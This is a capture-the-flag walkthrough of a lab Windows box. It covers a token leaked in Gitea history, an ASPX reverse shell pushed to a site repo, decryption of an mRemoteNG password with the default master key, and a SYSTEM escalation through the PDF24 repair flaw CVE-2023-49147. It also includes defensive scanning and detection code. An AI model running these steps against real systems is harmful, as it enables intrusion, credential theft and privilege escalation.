Starting with the nmap scan, we see a Golang HTTP server running on port 3000 and RDP on port 3389.
➜ ~ sudo nmap -sV -sC -T4 -p- 10.129.91.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 15:54 CEST
Stats: 0:03:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.82% done; ETC: 15:57 (0:00:00 remaining)
Nmap scan report for 10.129.91.105
Host is up (0.017s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Lock - Index
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
3000/tcp open http Golang net/http server
|_http-title: Gitea: Git with a cup of tea
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=b374a0b805ad1c3d; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=RqCkHbUQpJxlHHtiSK1ZjZfOFfg6MTc2MDM2MzgwMDgzNTk3MjcwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 13 Oct 2025 13:56:42 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjU
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=5e8db92f6778794c; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=CtXYbcLtNC-xruSv4iXIxj1DtS46MTc2MDM2MzgwMjkxNzQ1OTQwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 13 Oct 2025 13:56:42 GMT
|_ Content-Length: 0
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: LOCK
| NetBIOS_Domain_Name: LOCK
| NetBIOS_Computer_Name: LOCK
| DNS_Domain_Name: Lock
| DNS_Computer_Name: Lock
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-13T13:57:05+00:00
|_ssl-date: 2025-10-13T13:57:45+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2025-10-12T08:41:19
|_Not valid after: 2026-04-13T08:41:19
Gitea
On port 3000 we find a Gitea instance, version 1.21.3. Gitea is a lightweight, self-hosted GitHub alternative. The explore page lists a repository owned by ellen.freeman that contains a Python script, repos.py.

Git repositories
From the GitHub website: A repository is the most basic element of GitHub. It's a place where you can store your code, your files, and each file's revision history. Repositories can have multiple collaborators and can be either public or private. Because the repo tracks the history of every file, changes made to earlier versions of a script can be retrieved with git in the terminal or by browsing the history in the web app.

In the history we find two commits; the earlier version of the Python script still contains a personal access token. With this token we gain access to Gitea and its API. For example, we can retrieve the user details of the token's owner (piping through jq . pretty-prints the JSON).
➜ ~ curl -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f" http://10.129.91.105:3000/api/v1/user | jq .
{
"id": 2,
"login": "ellen.freeman",
"login_name": "",
"full_name": "",
"email": "ellen.freeman@lock.vl",
"avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
"language": "en-US",
"is_admin": false,
"last_login": "2023-12-28T11:38:25-08:00",
"created": "2023-12-27T11:13:10-08:00",
"restricted": false,
"active": true,
"prohibit_login": false,
"location": "",
"website": "",
"description": "",
"visibility": "public",
"followers_count": 0,
"following_count": 0,
"starred_repos_count": 0,
"username": "ellen.freeman"
}
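The reason the token was recoverable is that the later commit only removed it from the working tree, not from the object store; until history is rewritten and the token revoked, every old blob is still there. As an added example (not part of this write-up or of the repos.py script), the following Python scans `git log -p` output for 40-hex Gitea-style tokens on every added or removed line; the log excerpt, commit ids and token value are constructed here, not taken from the box.

```python
import re
from dataclasses import dataclass
# Gitea personal access tokens are 40 lowercase hex chars, the same shape as the
# token committed to repos.py and later "removed" in a follow-up commit.
TOKEN_RE = re.compile(r"\b[0-9a-f]{40}\b")

@dataclass
class Finding:
    commit: str   # commit that added or removed the line
    path: str     # file the hunk belongs to
    change: str   # "added" or "removed"
    secret: str   # redacted token (first 6 chars only)

def scan_history(log_text: str) -> list[Finding]:
    """Report tokens on every +/- line of `git log -p` output; only content
    lines are checked, so 40-hex commit ids in headers are never flagged."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):           # new-side file name
            path = line[4:].removeprefix("b/")
        elif line.startswith("--- "):           # old-side file name, skip
            continue
        elif line.startswith(("+", "-")):       # actual content change
            change = "added" if line[0] == "+" else "removed"
            for tok in TOKEN_RE.findall(line[1:]):
                findings.append(Finding(commit, path, change, tok[:6] + "..."))
    return findings

# Constructed `git log -p` excerpt, newest commit first; the token is a dummy.
SAMPLE_LOG = """\
commit 2222222222222222222222222222222222222222
diff --git a/repos.py b/repos.py
--- a/repos.py
+++ b/repos.py
@@ -1,2 +1,3 @@
 import requests
-TOKEN = "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
+import os
+TOKEN = os.environ["GITEA_TOKEN"]
commit 1111111111111111111111111111111111111111
diff --git a/repos.py b/repos.py
--- /dev/null
+++ b/repos.py
@@ -0,0 +1,2 @@
+import requests
+TOKEN = "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
"""
```

Run against a real repository with `git log -p --all | python3 -c 'import sys, scan; print(scan.scan_history(sys.stdin.read()))'` style plumbing; both the "removed" and the "added" hit point at the same leaked value, which is the situation on this box.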
Listing the repositories we can see as Ellen, we find the repo website.
➜ ~ curl -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f"
{
"id": 5,
"owner": {
"id": 2,
"login": "ellen.freeman",
"login_name": "",
"full_name": "",
"email": "ellen.freeman@lock.vl",
"avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
"language": "",
"is_admin": false,
"last_login": "0001-01-01T00:00:00Z",
"created": "2023-12-27T11:13:10-08:00",
"restricted": false,
"active": false,
"prohibit_login": false,
"location": "",
"website": "",
"description": "",
"visibility": "public",
"followers_count": 0,
"following_count": 0,
"starred_repos_count": 0,
"username": "ellen.freeman"
},
"name": "website",
"full_name": "ellen.freeman/website",
"description": "",
"empty": false,
"private": true,
"fork": false,
"template": false,
"parent": null,
"mirror": false,
"size": 7370,
"language": "CSS",
"languages_url":
}
]
To check what is inside the repo, we clone it using the token.
git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.129.91.105:3000/ellen.freeman/website.git
➜ website git:(main) ls -la
total 56
drwxrwxr-x 4 kali kali 4096 Oct 13 16:40 .
drwx-----x 107 kali kali 20480 Oct 13 16:42 ..
drwxrwxr-x 6 kali kali 4096 Oct 13 16:40 assets
-rw-rw-r-- 1 kali kali 43 Oct 13 16:40 changelog.txt
drwxrwxr-x 7 kali kali 4096 Oct 13 16:40 .git
-rw-rw-r-- 1 kali kali 15708 Oct 13 16:40 index.html
-rw-rw-r-- 1 kali kali 130 Oct 13 16:40 readme.md
I couldn't find any credentials in any of the files in the repos or history logs. Having access as Ellen, we can also upload files.
➜ website git:(main) ✗ git config user.email "test@test.com"
➜ website git:(main) ✗ git config user.name "mcz3n"
➜ website git:(main) ✗ git add test.txt
➜ website git:(main) ✗ git commit -m "test commit"
[main de682b3] test commit
1 file changed, 1 insertion(+)
create mode 100644 test.txt
➜ website git:(main) git push
To http://10.129.91.105:3000/ellen.freeman/website.git
73cdcc1..de682b3 main -> main
Since the web server on port 80 is IIS 10, we need an .aspx shell. ASPX pages are served by ASP.NET running under IIS. I found this ASPX reverse shell: https://gist.github.com/qtc-de/19dfc9018685fce1ba2092c8e2382a79. Change the IP and port to your VM's and upload the file.
➜ website git:(main) ✗ git add reverse.aspx
➜ website git:(main) ✗ git commit -m "reverse"
[main 247acfc] reverse
1 file changed, 153 insertions(+)
create mode 100644 reverse.aspx
➜ website git:(main) git push
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 8 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 1.73 KiB | 1.73 MiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.129.91.105:3000/ellen.freeman/website.git
de682b3..247acfc main -> main
Then trigger the file by visiting http://10.129.91.105/reverse.aspx, and we get a reverse shell.
➜ ~ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.204] from (UNKNOWN) [10.129.91.105] 49999
Microsoft Windows [Version 10.0.20348.3932]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
lock\ellen.freeman
c:\windows\system32\inetsrv>
mremoteng_decrypt
Inside c:\Users\ellen.freeman\Documents there is a config.xml.
c:\Users\ellen.freeman\Documents>type config.xml
type config.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
<Node Name="RDP/Gale" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="a179606a-a854-48a6-9baa-491d8eb3bddc" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
</mrng:Connections>
What stands out is the base64-encoded mRemoteNG password for Gale.Dekarios. mRemoteNG is an open-source, tabbed, multi-protocol remote connections manager. The connection file is protected only by mRemoteNG's default master password, mR3m, which is what the -p option below supplies, so anyone who can read config.xml can recover the stored credentials. With https://github.com/haseebT/mremoteng-decrypt-1 we can decrypt the password:
Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
➜ ~ python3 mremoteng_decrypt.py -s 'TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==' -p mR3m
Password: ty8wnW9qCKDosXo6
With the credentials for Gale.Dekarios we can log in over RDP and grab the user flag.
➜ ~ xfreerdp3 /v:10.129.91.105 /u:gale.dekarios /p:ty8wnW9qCKDosXo6 /cert:ignore
Root flag
What stands out immediately is the presence of PDF24 on the desktop.

I find a writeup for CVE-2023-49147: https://sploitus.com/exploit?id=PACKETSTORM:176206
- The exploit requires GUI access and a supported browser (e.g. Firefox or Chrome). This attack does not work with a recent version of the Edge browser or Internet Explorer, so we use Firefox, which is installed.
- PDF24 Creator has to be installed via the MSI file.
The installer is in a hidden folder, c:/_install/pdf24-creator-11.15.1-x64. At the end of the repair process the sub-process pdf24-PrinterInstall.exe is called with SYSTEM privileges and writes to the file "C:\Program Files\PDF24\faxPrnInst.log"; by setting an oplock on that file, the cmd window opened when pdf24-PrinterInstall.exe runs does not close. The SetOpLock tool can be downloaded here: https://github.com/googleprojectzero/symboliclink-testing-tools/releases/download/v1.0/Release.7z
In short: an action run by SYSTEM opens a cmd window, the oplock keeps it from closing, from that window we open the browser as SYSTEM, and from the browser we launch cmd.exe.
- Set the oplock to lock the cmd window:
  .\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" -r
- Start the repair process:
  msiexec.exe /fa .\pdf24-creator-11.15.1-x64.msi
- The repair process spawns a new cmd window, which won't close because of the oplock.
- Top bar: click on Properties, then open the link next to "Use Legacy Console".
- In the browser, press Ctrl+O to open a file, then type cmd.exe into the bar to open cmd as SYSTEM.
Now we are running as SYSTEM and can read the root flag.
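From the defender's side, the chain above is visible in process-creation telemetry: an interactive program (browser, cmd.exe) running as SYSTEM with pdf24-PrinterInstall.exe, or the msiexec repair that launched it, among its ancestors. As an added example, not from the write-up, this Python applies that rule to a constructed set of Sysmon-style process events; the field names, PIDs and executable paths are assumptions.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event ID 1 style); fields are assumed."""
    pid: int
    ppid: int
    image: str   # full path of the new process
    user: str    # account the process runs as

SYSTEM = r"nt authority\system"
# Programs a SYSTEM-level installer helper should never hand to a desktop user.
INTERACTIVE = {"firefox.exe", "chrome.exe", "cmd.exe", "powershell.exe", "explorer.exe"}
# Ancestors that turn such a launch into the PDF24 repair abuse pattern.
# msiexec.exe alone is noisy (custom actions run cmd.exe as SYSTEM); tune per estate.
SUSPECT_ANCESTORS = {"pdf24-printerinstall.exe", "msiexec.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events: list[ProcEvent]) -> list[str]:
    """Return one 'root > ... > child' chain per interactive SYSTEM process
    that descends from the PDF24 printer installer or an msiexec repair."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if ev.user.lower() != SYSTEM or basename(ev.image) not in INTERACTIVE:
            continue
        chain, cur = [basename(ev.image)], by_pid.get(ev.ppid)
        while cur is not None:                     # walk up to the root we know
            chain.insert(0, basename(cur.image))
            cur = by_pid.get(cur.ppid)
        if SUSPECT_ANCESTORS & set(chain[:-1]):    # suspect must be an ancestor
            hits.append(" > ".join(chain))
    return hits

# Constructed telemetry: the repair chain from the write-up plus a benign
# Firefox started by Gale's own explorer.exe (pid 50, not logged here).
SAMPLE_EVENTS = [
    ProcEvent(100, 4,   r"C:\Windows\System32\msiexec.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(200, 100, r"C:\Program Files\PDF24\pdf24-PrinterInstall.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(300, 200, r"C:\Program Files\Mozilla Firefox\firefox.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(400, 300, r"C:\Windows\System32\cmd.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(500, 50,  r"C:\Program Files\Mozilla Firefox\firefox.exe", r"LOCK\gale.dekarios"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT:", hit)
```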
